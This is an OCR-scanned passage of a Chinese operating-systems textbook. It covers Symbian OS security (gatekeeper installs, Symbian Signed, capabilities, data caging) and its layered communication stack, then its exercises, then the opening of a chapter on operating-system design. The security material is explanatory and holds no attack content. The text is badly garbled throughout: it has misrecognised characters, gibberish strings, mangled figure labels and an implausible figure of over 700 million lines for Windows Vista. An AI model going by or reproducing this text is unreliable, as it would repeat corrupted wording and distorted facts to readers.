销 一 一 每 次 涉及 到 访问 资源 的 系统 调用 都 需要 进行 检查 一 一 但 检查 一 个 
文件 的 所 有 者 是 售 匹 配 的 开销 会 更 长 。 这 个 折 中 在 Symbian 操作 系统 中 
效果 很 好 。 














Symbian 操作 系统 中 还 有 一 些 其 他 形式 的 文件 安全 。 在 Symbian 操作 
系统 的 存储 器 件 中 有 特定 的 区 域 ， 需 要 有 特定 权限 的 应 用 程序 才能 访 
问 。 这 种 特定 的 权限 只 将 安装 程序 赋予 了 应 用 程序 。 这 样 做 的 效果 是 ， 
新 安装 的 应 用 程序 在 安装 完成 后 即 被 保护 ， 不 受 任何 非 系 统 的 访问 ( 意 
味 着 非 系统 的 恶意 程序 ， 如 病毒 ， 不 能 感染 已 经 安装 的 程序 ) 。 为 外 ， 
文件 系统 预 留 了 专门 保存 应 用 程序 产生 的 特殊 数据 的 区 域 〈《 这 和 极 称 作 数 
据 锁定 ， 见 下 一 他 ) 。 

















对 Symbian 操作 系统 来 说 ， 权 限 的 使 用 和 文件 所 有 者 在 保护 文件 访 
问 上 的 效果 是 相当 的 。 


12.7 ”Symbian 操作 系统 的 安全 


智能 手机 提供 的 环境 很 难保 证 安全 。 像 我 们 之 前 提 到 的 ， 它 们 属于 
单 用 户 设备 ， 不 需要 在 使 用 基本 功能 前 进行 用 户 认 证 。 更 复杂 的 功能 
《如 应 用 软件 安装 ) 需要 授权 ， 但 不 需 认证 。 然 而 ， 知 能 手机 上 执行 的 
复杂 操作 系统 中 ， 有 很 多 途径 进行 数据 的 交换 (以 及 执行 程序 ) 。 在 这 
样 的 环境 进行 安全 防护 变 得 很 复杂 











AR 


Symbian 操作 系统 很 好 地 体现 了 这 一 安全 难度 。 用 户 期 望 基于 
Symbian 操作 系统 的 智能 手机 允许 不 经 认证 即 可 任意 使 用 一 一 没有 登录 
和 号 份 鉴 别 。 但 是 ， 你 肯定 经 历 过 ， 一 个 和 Symbian 操作 系统 同样 复杂 
的 操作 系统 很 容易 受到 病毒 、 里 虫 和 其 他 恶意 软件 的 影响 。 在 Symbian 
操作 系统 版 本 9 以 前 的 版 本 中 ， 操 作 系 统 提供 了 一 个 守门 人 陈 的 安全 功 

: 系统 询问 用 户 是 否 允 许 安装 每 一 个 应 用 程序 。 这 种 设计 的 思维 是 
只 有 用 户 自 己 安装 的 程序 会 造成 系统 虹 坏 ， 一 个 被 告知 的 用 户 会 知道 他 
所 要 安装 的 哪些 软件 是 恶意 软件 。 用 户 会 理智 地 使 用 它们 。 

















守门 人 式 设计 有 很 多 优点 。 例 如 : 一 个 新 的 没有 用 户 自 己 安装 的 应 
用 程序 的 智能 手机 是 一 个 可 以 无 故障 运行 的 系统 。 只 安装 用 户 认 为 不 是 
恶意 软件 的 程序 ， 即 可 保证 系统 的 安全 。 这 种 设计 的 问题 是 ， 用 户 并 不 
.是 知道 安装 一 个 应 用 程序 的 全 部 后 果 。 存 在 盆 六 成 有 用 的 应 用 程序 的 
病毒 ， 在 提供 有 用 功能 的 同时 静默 地 安装 恶意 代码 。 普 通用 户 无 法 验证 








总 
su 





所 有 软件 的 可 信和 度 。 





Symbian 操作 系统 版 本 9 的 信任 验证 机 制 提 升 到 了 一 个 新 设计 的 平台 
上 。 这 个 版 本 的 操作 系统 保留 原 有 的 守门 人 式 机 制 ， 但 是 在 用 户 之 外 提 
供 了 对 安装 软件 进行 验证 的 机 制 。 每 个 软件 开发 者 现在 需要 负责 通过 数 
字 签 名 技术 来 验证 一 个 软件 是 由 其 编写 的 。 不 是 所 有 的 软件 都 必须 有 这 
样 的 验证 ， 只 有 需要 访问 特定 系统 资源 的 软件 需要 。 当 一 个 应 用 软件 需 


要 数字 签名 时 ， 需 要 如 下 几 个 步 又: 











JJ) 软 件 开 发 者 需要 从 可 信 的 第 三 方 获得 一 个 三 商 ID， 这 些 可 信 的 第 
三 方 由 Symbian 来 进行 鉴定 。 


2) 当 一 个 开发 者 开发 了 一 个 程序 包 并 希望 发 布 时 ， 他 必须 将 其 提交 
到 可 信 的 第 三 方 进行 验证 。 开 及 者 提交 其 广 丙 ID、 应 用 程序 以 及 该 应 用 
程序 访问 系统 的 方式 列表 。 


3) 可 信 第 三 方 验证 所 提供 的 访问 类 型 列表 是 完全 的 ， 而 且 没 有 其 他 
类 型 的 访问 友 生 。 如 果 该 可 信 第 三 方 可 以 进行 此 验证 ， 该 软件 即 由 可 信 
第 三 方 进行 签 名。 这 意味 着 安装 包 中 会 包含 一 些 特殊 的 信息 ， 详 细 地 描 
述 该 软件 会 对 Symbian 操作 系统 做 出 什么 操作 。 











4) 该 安装 包 被 送 回 到 软件 开发 人 员 处 ， 并 可 以 及 放 给 用 户 。 需 要 注 
意 的 是 ， 这 个 方法 依赖 于 应 用 程序 如 何 访问 系统 资源 。 在 Symbian 操作 
系统 中 ， 应 用 程序 必须 拥有 访问 一 个 资源 的 能 力 ， 才 会 允许 使 用 相应 的 





资源 。 这 种 行为 能 力 的 机 制 建 立 在 Symbian 操作 系统 的 内 核 中 。 当 一 个 
进程 被 创建 时 ， 该 进程 的 进程 控制 块 的 一 部 分 用 来 记录 该 进程 被 授予 的 
权限 。 当 进程 试图 使 用 它 不 能 使 用 的 权限 时 ， 该 访问 将 被 内 核 阻止 。 


这 个 看 起 来 复杂 的 机 制 使 得 我 们 可 以 在 Symbian 操作 系统 中 建立 一 
个 目 动 的 守门 人 陈 机 制 ， 来 验证 要 安装 的 软件 。 安 闭 过 程 检 查 安装 包 中 
的 标识 。 如 果 该 标识 是 有 效 的 ， 该 应 用 程序 被 授予 的 权限 将 记录 下 来 ， 
同时 可 以 在 执行 时 通过 内 核 的 检查 。 





图 12-3 中 的 图 描述 了 Symbian 操 作 系 统 版 本 9 中 的 信任 关系 。 需 要 注 
意 的 是 ， 系 统 中 内 置 了 多 个 信任 等 级 。 有 些 应 用 软件 不 访问 任何 系统 资 
源 ， 故 而 也 不 需要 签名 。 一 个 例子 是 只 在 屏幕 上 显示 内 容 的 简单 应 用 。 
这 些 应 用 软件 不 被 也 不 需 补 信任。 下 一 个 信任 级 别 是 用 户 级 签名 应 用 程 
序 级 。 这 些 应 用 程序 只 被 授予 其 需要 的 权限 。 第 三 个 信任 等 级 由 系统 服 
务 组 成 。 同 用 户 级 应 用 程序 一 样 ， 这 些 服务 只 需要 特定 的 权限 以 便 完 成 
其 任务 。 在 一 个 如 同 Symbian 操 作 系统 的 微 内 核 体 系 结构 中 ， 这 些 服务 
运行 在 用 户 态 ， 并 像 用 户 程序 一 样 被 信任 。 最 后 ， 有 一 类 程序 需要 系统 
的 完全 信任 。 这 组 程序 拥有 修改 整个 系统 的 能 力 ， 并 由 内 核 代 码 组 成 。 














可 信 计 算 环 境 : 可 信 计 算 基础 : 
系统 服务 以 不 同 的 权限 运行 具有 全 部 权限 修改 文件 系统 ， 
包括 内 核 、F32、SWInstall 


— 


了 Se | iis 
Å 4 j MMF 入 \ IME SWJnstall 是 









| etel kernel, F32, SWinstall ems 守门 人 式 机 
IUN j |/ 制 的 执行 者 
; ~ esock .A 
~ eee =~ 
已 签名 应 用 程序 : 
按照 其 声明 的 意图 进行 签名 未 签名 应 用 程序 : 
的 低 信 任 等 级 软件 不 影响 系统 环境 和 文件 系统 


的 不 可 信 应 用 程序 
图 12-3 Symbian 操作 系统 通过 信任 关系 来 保证 安全 


在 这 个 系统 中 有 大 二 个 方面 看 起 来 值得 质疑 。 例 如 ， 这 样 复杂 的 机 
制 真 的 有 必要 吗 (尤其 是 需要 花费 金钱 来 制作 的 情况 下 〉? 结论 是 肯定 
K: Symbian 签名 系统 代 答 用 户 来 对 软件 进行 完整 性 验证 ， 并 且 该 验证 
必须 被 执行 。 这 一 机 制 看 起 来 可 能 会 带 来 开发 上 的 难度 。 是 否 每 次 在 真 
实物 理 设 备 上 进行 测试 都 需要 一 个 新 的 签名 的 安 闭 包 ? 为 了 解决 这 个 问 
题 ，Symbian 操 作 系统 识别 开 肥 人 员 的 特殊 签名 。 一 个 开 及 人 员 必 须 获 
得 一 个 有 时 效 限 制 (通常 是 6 个 月 〉 的 证 书 和 一 个 特殊 的 智能 手机 ， 即 
可 使 用 自己 的 数字 证 书 来 创建 安装 包 。 











除了 这 样 的 守门 人 式 机 制 外 ，Symbian 操 作 系 统 版 本 9 同时 采用 数据 
锁定 (Data Caging) 技术 ， 来 组 织 特定 目录 下 的 数据 。 比 如 ， 可 执行 代 








码 只 存在 一 个 目录 中 ， 而 该 目录 只 对 软件 安装 程序 可 写 。 男 外 ， 应 用 程 
序 只 能 在 一 个 目录 中 进行 写 操作 ， 它 们 各 自 的 数据 不 能 被 其 他 程 友 访 
问 。 


12.8 Symbian 操作 系统 中 的 通信 


Symbian 操作 系统 按照 特殊 的 标准 设计 ， 并 使 用 客户 机 /服务 器 机 制 
和 基于 栈 的 配置 ， 以 事件 驱动 型 的 通信 为 特色 。 


12.8.1 基本 基础 结构 





Symbian 操作 系统 的 通信 系统 基础 结构 建立 在 基本 构件 之 上 。 考 虑 
如 图 12-4 中 所 示 的 一 个 非常 通用 的 模式 。 考 虑 把 这 个 图 作为 一 个 可 组 织 
模型 的 起 点 。 在 这 个 栈 的 底层 是 物理 设备 ， 以 一 定 方 式 链接 到 计算 机 。 
这 个 设备 可 以 是 集成 在 通信 设备 中 的 手机 调制 解 调 器 或 是 一 个 蓝牙 无 线 
电 沪 置 。 在 此 ， 我 们 不 关心 底层 的 硬件 实现 ， 而 是 把 这 个 物理 设备 当做 
一 个 会 以 合适 的 方式 啊 应 软件 用 出 的 命令 的 抽象 设备 。 
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图 12-4 Symbian 操作 系统 中 面向 块 的 通信 结构 


下 一 层 ， 即 我 们 需要 关心 的 第 一 层 ， 是 设备 驱动 层 。 我 们 已 经 指出 
了 设备 驱动 的 结构 ;这 一 层 的 软件 直接 通过 LDD 和 PDD 结 构 与 硬件 配合 
工作 。 这 一 层 的 软件 是 硬件 相关 的 ， 每 个 新 型 号 的 硬件 设备 都 需要 一 个 
软件 的 设备 驱动 为 其 衔接 。 不 同 的 硬件 需要 不 同 的 设备 驱动 ， 但 它们 都 
为 上 层 提供 同样 的 接口 。 协 议 层 期 望 无 论 什 么 样 的 硬件 都 具有 相同 的 接 
phe 


下 一 层 就 是 协议 实现 层 ， 包 含 了 Symbian 操作 系统 所 文 持 的 各 种 协 
议 的 实现 。 这 些 实现 承担 了 下 层 的 设备 驱动 接口 ， 并 同上 面 的 应 用 层 所 
供 了 一 个 单一 、 统 一 的 接口 。 这 就 是 提供 诸如 蓝牙 和 TCP/IP 协 议 的 各 种 
协议 的 部 分 








最 后 ， 应 用 程序 层 是 最 高 的 一 层 。 该 层 包含 了 需要 利用 通信 基础 结 
构 的 应 用 程序 。 应 用 程序 不 清楚 通信 是 怎样 实现 的 ， 但 是 ， 该 应 用 程序 
要 通知 操作 系统 它 需 要 使 用 哪个 具体 设备 。 一 旦 设备 就 位 ， 应 用 程序 
不 直接 访问 设备 ， 而 是 依赖 协议 实现 层 的 API 来 驱动 真实 硬件 。 





12.8.2 ”更 仔细 地 观察 基础 结构 


Symbian 操作 系统 的 一 个 更 详细 的 结构 如 图 12-5 所 示 。 这 个 图 基于 
图 12-4 的 通用 结构 ， 原 图 中 的 层 被 细 分 为 Symbian 操作 系统 中 使 用 的 可 
操作 单元 。 


应 用 程序 层 


| 用 户 端 代码 | 
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图 12-5 Symbian 操作 系统 中 的 通信 设施 具有 一 组 丰富 的 功能 
1. 物 理 设 备 


首先 需要 注意 的 是 ， 物 理 设备 层 没 有 变化 。 如 我 们 之 前 所 述 ， 
Symbian 操 作 系 统 并 不 直接 控制 硬件 。 所 以 ， 它 兼容 所 有 符合 该 层 的 API 
设计 的 硬件 ， 但 不 需 指定 人 硬件 本 里 是 如 何 设计 和 建造 的 。 这 一 点 对 
Symbian 操作 系统 和 其 开发 人 员 都 有 共处。 通过 将 硬件 看 作 抽象 结构 并 
通过 这 一 抽象 进行 通信 ，Symbian 操 作 系统 的 设计 人 员 保证 了 Symbian 操 
作 系 统 可 以 广泛 地 兼容 现 有 设备 ， 同 时 适应 未 来 的 硬件 。 


2. 设 备 驱 动 层 


如 图 12-5 所 示 ， 设 备 驱动 层 和 被 分 为 两 层 。 如 我 们 之 前 所 述 ，PPD 层 
通过 硬件 端口 直接 与 硬件 设备 进行 交互 。 而 LDD 层 与 协议 实现 层 交 互 ， 
实现 了 Symbian 操 作 系 统 中 与 硬件 相关 的 集 略 。 这 些 集 略 包 括 输 入 输出 
绥 冲 、 中 断 机 制 和 流 控 制 。 


3. 协 议 实现 层 


在 图 12-5 中 ， 协 议 实现 层 分 为 了 在 干 子 层 。 在 协议 实现 层 中 使 用 了 
四 种 模块 ， 列 举 在 下 面 : 














CSY 模 块 : 协议 实现 层 最 底层 是 通信 服务 ， 即 CSY 模 块 。 一 个 CSY 
模块 直接 通过 设备 驱动 程序 的 PDD 部 分 与 硬件 通信 ， 实 现 了 协议 的 许多 


底层 特征 。 例 如 ， 一 个 协议 可 能 需要 问 硬 件 设 备 传递 原始 数据 ， 或 者 需 
要 在 传输 过 程 中 使 用 7 位 或 8 位 的 缓存 。 这 些 工 作 模式 会 被 CSY 模 块 处 
Hs 





TSY 模 块 : 电话 中 包含 了 很 大 一 部 分 通信 基础 结构 ， 这 些 功 能 需 
要 由 特殊 的 模块 来 进行 实现 。 电 话 服务 (TSY) 模块 实现 了 这 些 功能 。 
基本 的 TSY 可 能 在 很 多 的 人 硬件 上 支持 标准 的 TSY， 例 如 拨打 和 切断 电 
话 。 更 高 级 的 TSY 模 块 可 以 支持 更 高 级 的 硬件 ， 比 如 支持 GSM 功 能 。 


-PRT 模块 :协议 实现 层 的 核心 模块 是 协议 模块 PRT 模块 )。 该 模 
块 由 服务 器 用 来 实现 具体 的 协议 。 一 个 服务 器 在 试图 使 用 协议 的 时 候 创 
建 一 个 PRT 模 块 的 实例 。 例 如 ，TCPIP.PRT 模 块 中 实现 了 TCP/P 相 关 的 
协议 。 蓝 牙 协议 在 BT.PRT 模 块 中 实现 。 


"MTM: 由 于 Symbian 操作 系统 被 设计 用 来 处 理 短信 息 ， 设 计 人 员 
专门 为 处 理 的 所 有 类 型 的 短信 息 建立 了 相应 的 机 制 ， 而 这 些 专 门 的 模块 
称 为 信息 类 型 模块 (MTM 模 块 ) 。 短 信息 处 理 包括 多 个 方面 ，MTM 模 
块 需要 处 理 所 有 这 些 需 求 。 用 户 界 面 类 MTM 模 块 需要 实现 多 种 供用 户 
碍 看 和 处 理 短 信息 的 方式 ， 包 括 如 何 阅读 短信 息 ， 如 何 被 告知 短信 息 发 
送 进度 等 。 客 户 端 MTM 模 块 处 理 寻 址 、 创 建 、 回 复 短 信息 ; MRA 
端 MTM 模 块 需要 实现 面向 服务 器 的 相关 短信 息 省 理 功能 ， 如 目录 管 
理 、 特 定 信 息 的 管理 等 。 





根据 所 使 用 通信 类 型 的 不 同 ， 这 些 模块 以 不 同 的 方式 彼此 依赖 。 例 
如 ， 实 现 使 用 蓝牙 的 协议 ， 我 们 只 需要 物理 器 件 上 层 的 PRT 模 块 即 可 。 
某 些 ITDA 协 议 也 是 如 此 。 而 基于 PPP 的 TCP/IP 实 现 则 需要 使 用 PRT 模 
块 、TSY 模 块 和 CSY 模 块 ， 不 基于 PPP 的 TCP/IP 协 议 则 不 需要 TSY 模 块 
和 CSY 模 块 ， 但 是 其 PRT 模 块 需要 直接 连接 到 网 络 设备 驱动 上 。 





4. 结 构 模 块 化 


基于 模块 化 的 思想 在 这 样 一 个 栈 式 的 模型 实现 中 是 很 有 用 的 。 在 这 
个 分 层 的 设计 中 ， 从 例子 中 可 以 看 出 ， 抽 象 带 来 的 优势 是 很 明显 的 。 考 
虑 TCP/IP 协 议 的 实现 。 一 个 PPP 连 接 既 可 以 直接 使 用 CSY 模 块 ， 也 可 以 
选择 GSM 或 普通 调制 解 调 器 的 TSY 实 现 ， 后 者 实际 底层 仍 由 CSY 模 块 来 
实现 。 未 来 新 的 电话 技术 出 现 后 ， 当 前 的 结构 仍然 可 以 起 作用 ， 我 们 只 
需要 为 新 的 电话 实现 添加 一 个 TSY 模 块 。 另 外 ， 细 调 TCP/IP 协 议 栈 不 需 
要 修改 任何 其 依赖 的 模块 ， 只 需要 简单 地 调整 TCP/IP PRT 模 块 。 这 样 广 
泛 的 模块 化 意味 着 在 已 有 结构 上 很 容易 添加 新 代码 、 丢 弃 旧 代码 ， 当 前 
代码 的 修改 不 会 对 整个 系统 带 来 巨大 的 变化 ， 也 不 需要 大 量 的 重新 安 
装 。 

















最 后 ， 图 12-5 在 应 用 层 添加 了 子 层 。 应 用 程序 通过 CSY 模 块 和 协议 
实现 层 中 的 协议 模块 进行 交互 。 虽 然 我 们 可 以 认为 这 些 模块 属于 协议 实 
现 层 的 一 部 分 ， 但 更 清晰 的 表示 是 ， 这 些 模块 在 协助 应 用 程序 进行 操 
作 。 例 如 ， 在 使 用 红外 接口 将 短信 息 发 送 到 手机 的 过 程 中 ， 应 用 程序 会 








在 应 用 程序 中 使 用 IRCOMM CSY 模 块 ， 通 过 协议 实现 层 的 短信 息 实现 
模块 来 完成 。 同 样 ， 在 这 样 一 个 过 程 中 ， 模 块 化 带 来 了 很 大 的 优势 ， 应 


用 程序 可 以 关注 实现 其 擅长 的 功能 ， 而 不 是 通信 过 程 。 


129 2. 


Symbian 操作 系统 是 一 个 为 智能 手机 平台 设计 的 面 癌 对 象 的 操作 系 
统 。 它 的 微 内 核 设计 只 提供 了 很 小 的 纳 核 ， 只 实现 了 最 快 和 最 简单 的 内 
核 功 能 。Symbian 操 作 系统 通过 客户 机 /服务 器 的 体系 结构 ， 将 对 系统 资 
源 的 访问 分 配给 用 户 态 的 服务 器 。Symbian 操 作 系统 虽然 是 为 智能 手机 
设计 的 ， 但 其 也 拥有 很 多 通用 操作 系统 的 特性 : 进程 和 线程 、 内 存 管 
理 、 文 件 系统 文 持 、 丰 富 的 通信 文 持 。 同 时 ，Symbian 操 作 系统 也 实现 
了 一 些 独特 的 特性 ， 比 如 ， 活 动 对 象 使 等 竺 外 部 事件 更 为 迅速 、 没 有 虚 
拟 内 存 使 得 内 存 管 理 更 富有 挑战 性 、 文 持 面 癌 对 象 的 设备 驱动 程序 采用 


双 层 抽象 结构 。 


习题 


1. 对 下 列 的 每 一 个 服务 ， 描 述 其 在 如 Symbian 操作 系统 这 样 的 微 内 
核 操作 系统 中 ， 是 在 用 户 态 还 是 内 核 态 执 行 。 





调度 线程 的 执行 。 

-打印 一 个 文档 。 

MEETER RIAS o 
-管理 线程 对 屏幕 的 访问 。 

-在 短信 息 到 达 时 发 出 声音 。 

中 断 当 前 执行 并 接听 电话 。 

2. 列 举 微 内 核 设计 带 来 的 三 个 效率 提升 。 
3. 列 举 微 内 核 设计 带 来 的 三 个 效率 问题 。 


4.Symbian 操 作 系 统 将 其 内 核 分 割 为 纳 核 和 Sym-bian 内 核 两 部 分 。 如 
动态 内 存 管理 之 类 的 服务 被 认为 过 于 复杂 而 不 能 进入 纳 核 。 摘 述 动态 内 
存 管 理 中 的 复杂 模块 ， 解 释 为 什么 不 能 将 其 放 进 微 内 核 。 








5. 我 们 讨论 过 ， 活 动 对 象 使 得 IO 操作 更 有 效率 。 你 认为 应 用 程序 是 


售 能 够 同时 使 用 多 个 活动 对 象 ?” 系统 在 多 个 WO 事件 发 生 时 会 如 何 响 
应 ? 


6.Symbian 操 作 系统 中 的 安全 是 否 关 注 软 件 安装 和 应 用 程序 的 
Symbian 签名 ? 这 是 否 足够 安全 ? 是 否 会 有 某 个 场景 ， 应 用 程序 可 以 不 
必 安 装 即 被 运行 ? GER: 考虑 手机 数据 输入 的 所 有 可 能 方式 ) 

7. 在 Symbian 操作 系统 中 ， 广 泛 应 用 了 基于 服务 的 对 共享 资源 的 保 
护 。 列 举 三 种 在 微 内 核 环境 下 ， 这 种 方式 协调 资源 的 优势 。 思 考 这 些 优 
势 对 不 同体 系 结构 的 影响 。 


第 13 章 ”操作 系统 设计 


在 过 去 的 12 章 中 ， 我 们 讨论 了 许多 话题 并 且 分 析 了 许多 与 操作 系统 
相关 的 概念 和 实例 。 但 是 研究 现 有 的 操作 系统 不 同 于 设计 一 个 新 的 操作 
系统 。 在 本 章 中 ， 我 们 将 简 述 操作 系统 设计 人 员 在 设计 与 实现 一 个 新 系 
统 时 必须 要 考虑 的 茶 些 问题 和 权衡 。 








在 系统 设计 方面 ， 关 于 什么 是 好 ， 什 么 是 坏 ， 存 在 着 一 定数 量 的 民 
间 传 说 在 操作 系统 界 流 传 ， 但 是 令 人 吃惊 的 是 这 些 民 间 传 说 很 少 被 记录 
下 来 。 最 重要 的 一 本 书 可 能 是 Fred Brooks 的 经 典 著作 The Mythical Man 
Month 〈 中 文 译 名 《人 月 神话 》) 。 在 这 本 书 中 ， 作 者 讲述 了 他 在 设计 
与 实现 IBM OS/360 系 统 时 的 经 历 。 该 书 的 20 周 年 纪念 版 修订 了 某 些 素材 
并 且 新 增加 了 4 章 (Brooks,1995) 。 


有 关 操 作 系 统 设计 的 三 篇 经 典 论 文 是 “Hints for Computer System 
Design”( 计 算 机 系统 设计 的 忠告 ，Lampson,1984) 、“On Building 
Systems that Will Fail”( 论 建造 将 要 失败 的 系统 ，Corbat6,1991) 

和 “End-to-End Arguments in System Design” ( 系统 设计 中 端 到 端的 论 
据 ，Saltzer 等 人 ，1984) 。 与 Brooks 的 著作 一 样 ， 这 三 篇 论文 都 极其 出 
色 地 经 历 了 岁月 的 考验 ， 其 中 的 大 多 数 真 知 灼 见 在 今天 仍然 像 文章 首次 
发 表 时 一 样 有 效 。 


本 章 吸收 了 这 些 资料 来 源 ， 另 外 加 上 了 作者 作为 三 个 系统 的 设计 者 
或 合作 设计 者 的 个 人 经 历 ， 这 三 个 系统 是 : Amoeba (Tanenbaum 等 人 ， 
1990) 、MINIX (Tanenbaum#!!Woodhull,1997) 和 Globe (Van Steen 等 
人 ，1999a) 。 由 于 操作 系统 设计 人 员 在 设计 操作 系统 的 最 优 方法 上 没 
有 达成 共识 ， 因 此 与 前 面 各 章 相 比 ， 本 章 更 加 主观 ， 也 无 颖 更 具有 争 
We 


13.1 设计 问题 的 本 质 





操作 系统 设计 与 其 说 是 精确 的 科学 ， 不 如 说 是 一 个 工程 项 目 。 设 置 
清晰 的 目标 并 且 满 足 这 些 目标 非常 困难 。 我 们 将 从 这 些 观 点 开始 讨论 。 





13.1.1 HER 


为 了 设计 一 个 成 功 的 操作 系统 ， 设 计 人 员 对 于 需要 什么 必须 有 清晰 
的 思路 。 缺 乏 目 标 将 使 随后 的 决策 非常 难于 做 出 。 为 了 明确 这 一 点 ， 看 
一 看 两 种 程序 设计 语言 PL/I 和 C 会 有 所 启发 。PL/I 是 IBM 公 司 在 20 志 纪 60 
年 代 设计 的 ， 因 为 在 当时 必须 支持 FORTRAN 和 COBOL 是 一 件 令 人 讨厌 
的 事 ， 同 时 令 人 揽 雁 的 是 ， 学 术 界 背地 里 吐 哮 着 Algol 比 这 两 种 语言 都 
要 好 。 所 以 IBM 设 立 了 一 个 委员 会 来 创作 一 种 语言 ， 该 语言 力图 满足 所 
有 人 的 需要 ， 这 种 语言 就 是 PL/1。 它 具有 一 些 FORTRAN 的 特点 、 一 些 
COBOL 的 特点 和 一 些 Algol 的 特点 。 但 是 该 语言 失败 了 ， 因 为 它 缺 乏 统 
一 的 洞察 力 。 它 只 是 彼此 互相 竞争 的 功能 特性 的 大 杂烩 ， 并 且 过 于 笨重 
而 不 能 有 效 地 编译 。 





现在 考察 C 语 言 。 它 是 一 个 人 (Dennis Ritchie) 为 了 一 个 目的 〈 系 
统 程序 设计 ) 而 设计 的 。C 语 言 在 所 有 的 方面 都 取得 了 巨大 的 成 功 ， 因 
为 Ritchie 知 道 他 需要 什么 ， 不 需要 什么 。 结 果 ， 在 面世 儿 十 年 之 后 ，C 











语言 仍然 在 广泛 使 用 。 对 于 需要 什么 要 有 一 个 清晰 的 洞察 力 是 至 关 重 要 
的 。 





操作 系统 设计 人 员 需 要 什么 ? RHE, SAN AREAL, fh 
入 式 系统 就 不 同 于 服务 器 系统 。 然 而 ， 对 于 通用 的 操作 系统 而 言 ， 需 要 
BLAS SEAS HY BE 


]) 定 义 抽象 概念 。 
2) 提 供 基本 操作 。 
3) 确 保 隔 离 。 
A) FETE 


下 面 将 描述 这 些 要 素 。 





一 个 操作 系统 最 重要 但 可 能 最 困难 的 任务 是 定义 正确 的 抽象 概念 。 
有 一 些 抽象 概念 ， 例 如 进程 和 文件 ， 多 年 以 前 就 已 经 提出 来 了 了， 似乎 比 
较 显 而 易 见 。 其 他 一 些 抽象 概念， 例如 线程 ， 还 比较 新 鲜 ， 就 不 那么 成 
熟 了 。 例 如 ， 如 果 一 个 多 线程 的 进程 有 一 个 线程 由 于 等 待 键盘 输入 而 阻 
符 ， 那 么 由 这 个 进程 通过 调用 fork 函 数 创建 的 新 进程 是 否 也 包含 一 个 等 
符 键 盘 输入 的 线程 ? 其 他 的 抽象 概念 涉及 同步 、 信 号 、 内 存 模 型 、L/O 
的 建 模 以 及 其 他 领域 。 





每 一 个 抽象 概念 可 以 采用 有 具体 数据 结构 的 形式 实例 化 。 用 户 可 以 创 
建 进程 、 文 件 、 信 和 号 量 等 。 基 本 操作 则 处 理 这 些 数 据 结构 。 例 如 ， 用 户 
可 以 读 写 文件 。 基 本 操作 以 系统 调用 的 形式 实现 。 从 用 户 的 观点 来 看 ， 
操作 系统 的 核心 是 由 抽象 概念 和 其 上 的 基本 操作 所 构成 的 ， 而 基本 操作 
则 可 通过 系统 调用 加 以 利用 。 





由 于 多 个 用 户 可 以 同时 登录 到 一 台 计 算 机 ， 操 作 系 统 需 要 提供 机 制 
将 他 们 隔离 。 一 个 用 户 不 可 以 干扰 男 一 个 用 户 。 为 了 保护 的 目的 ， 进 程 
概念 广泛 地 用 于 将 资源 集合 在 一 起 。 文 件 和 其 他 数据 结构 一 般 也 是 受 保 
护 的 。 确 保 每 个 用 户 只 能 在 授权 的 数据 上 执行 授权 的 操作 是 系统 设计 的 
关键 目标 。 然 而 ， 用 户 还 希望 共 译 数据 和 资源 ， 因 此 隔离 必须 是 选择 性 
的 并 且 要 在 用 户 的 控制 之 下 。 这 就 使 问题 更 加 复杂 化 了 。 电 子 邮件 程序 
不 应 该 弄 坏 Web 浏 览 占 程序 ， 即 使 只 有 一 个 用 户 ， 不 同 的 进程 也 应 该 隔 
离开 来 。 














与 这 一 要 扣 密 切 相 关 的 是 需要 阳 离 故 障 。 如 果 系 统 的 系 一 部 分 骨 尝 
(最 为 一 般 的 是 一 个 用 户 进程 崩 演 ) ， 不 应 该 使 系统 的 其 余部 分 随 之 崩 
沉 。 系 统 设计 应 该 确保 系统 的 不 同 部 分 良好 地 相互 隔离 。 从 理想 的 角度 
看 ， 操 作 系 统 的 各 部 分 也 应 该 相互 隔离 ， 以 便 使 故障 独立 。 








最 后 ， 操 作 系 统 必须 管理 人 硬件。 特别 地 ， 它 必须 人 处理 所有 低级 心 
片 ， 例 如 中 断 控制 器 和 总 线 控制 器 。 它 还 必须 提供 一 个 框架 ， 从 而 使 设 
备 驱动 程序 得 以 管理 更 大 规模 的 IO 设备 ， 例 如 磁盘 、 打 印 机 和 显示 


13.1.2 ”设计 操作 系统 为 什么 困难 


摩尔 定律 表明 计算 机 硬件 每 十 年 改进 100 倍 ， 但 却 没有 一 个 定律 宣 
称 操 作 系 统 每 十 年 改进 100 倍 。 甚 至 没有 人 能 够 宣称 操作 系统 每 十 年 在 
某 种 程度 上 会 有 所 改善 。 事 实 上 ， 可 以 举 出 事例 ， 一 些 操 作 系统 在 很 多 
重要 的 方面 〈 例 如 可 靠 性 ) 比 20 世 纪 70 年 代 的 UNIX 版 本 7 还 要 糟糕 。 








为 什么 会 这 样 ? 大 部 分 贡 任 常 弟 归 笨 于 惯性 和 海 望 回 后 兼容 ， 不 能 
坚持 良好 的 设计 原则 也 是 问题 的 根源 。 但 是 还 不 止 这 些 。 操 作 系 统 在 特 
定 的 方面 根本 不 同 于 计算 机 商店 以 49 美 元 销售 的 小 型 应 用 程序 。 我 们 下 
面 就 看 一 看 使 设计 一 个 操作 系统 比 设计 一 个 应 用 程序 要 更 加 困难 的 8 个 


问题 。 











第 一 ， 操 作 系统 已 经 成 为 极其 庞大 的 程序 。 没 有 一 个 人 能 够 坐 在 一 
台 PC 机 前 在 几 个 月 内 匆匆 地 完成 一 个 严肃 的 操作 系统 。UNIX 的 所 有 当 
前 版 本 都 超过 了 300 万 行 代码 ，Windows Vista 有 超过 500 万 行 的 内 核 代码 
《全 部 代码 超过 7 亿 行 ) 。 没 有 一 个 人 能 够 理解 300 万 到 500 万 行 代码 ， 
更 不 必 说 7 亿 行 代 码 。 当 你 拥有 一 件 产 品 ， 如 果 没 有 一 名 设计 师 能 够 有 
望 完全 理解 它 时 ， 结 果 经 常 远 没有 达到 最 优 也 就 不 难 预料 了 。 





操作 系统 不 是 世界 上 最 复杂 的 系统 ， 例 如 ， 航 空 母 舰 就 要 复杂 得 
多 ， 但 是 航空 母 舰 能 够 更 好 地 分 成 相互 隔离 的 部 分 。 设 计 航空 母 舰 上 的 


卫生 间 的 人 员 根 本 不 必 关 心 雷达 系统 ， 这 两 个 子 系统 没有 什么 相互 作 
用 。 而 在 操作 系统 中 ， 文 件 系统 经 党 以 意外 的 和 无 法 预料 的 方式 与 内 存 
系统 相互 作用 。 





第 二 ， 操 作 系 统 必 须 处 理 并 发 。 系 统 中 往往 存在 多 个 用 尸 和 多 个 设 
备 同 时 处 于 活动 状态 。 管 理 并 发 目 然 要 比 管理 单一 的 顺序 活动 复杂 得 
